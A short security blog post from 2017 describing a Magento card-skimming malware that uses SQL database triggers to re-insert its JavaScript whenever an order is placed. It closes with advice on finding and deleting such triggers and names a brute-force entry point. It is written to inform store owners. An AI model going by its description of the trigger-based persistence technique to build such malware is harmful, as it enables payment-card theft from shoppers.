Self-Healing Magento Malware Attack

By Aakanksha Patel
February 16, 2017
Self-Healing Magento Malware Attack

A new self-healing malware has been discovered by Dutch malware experts. This malware targets online stores running on the Magento platform. It starts execution whenever a user places a new order and can self-heal using code hidden in the website’s database.

Though this is not the first time a malware is hiding code within a database of the website, it is certainly the First Magento malware that uses SQL stored procedures.

How it attacks

When a new order is placed by the user, a malicious database trigger (a set of automated SQL operations, also known as a stored procedure) executes before Magento puts together the PHP code and assembles the page.

This database trigger checks if the malware’s malicious JavaScript code is present in the store’s header, footer, and copyright section. Moreover, it also looks for different Magento CMS blocks where the malicious code could also be located.

If no traces of its JavaScript code are found, the database trigger contains instructions that will re-insert it in the website’s source code, through a series of SQL operations.

Although this Magento malware has  JS & PHP components that steal users card information, the SQL component is new. According to experts, the SQL portion is there to ensure the malware survives as long as possible.

When experts tried removing the malware it became resilient and began to attack the DB rather than the e-commerce app. The very nature of this malware is extremely complex and may need to be remedied by a certified Magento developer to ensure it is removed completely and effectively.

How to check and fix the malware

One needs to check the hidden malware in the database. As Magento Enterprise and other community extensions contain legitimate triggers. Look for triggers with suspicious SQL code, such as anything containing admin, .js, script or lesser than normal HTML tags. Once found, it needs to be deleted.

For future reference

The entry vector for this malware was a brute force attack on /rss/catalog/notifystock/ in what was previously believed to be a completely secure. This needs to be kept in mind while managing the security of your Magneto store in the future.

Want to get in touch with us?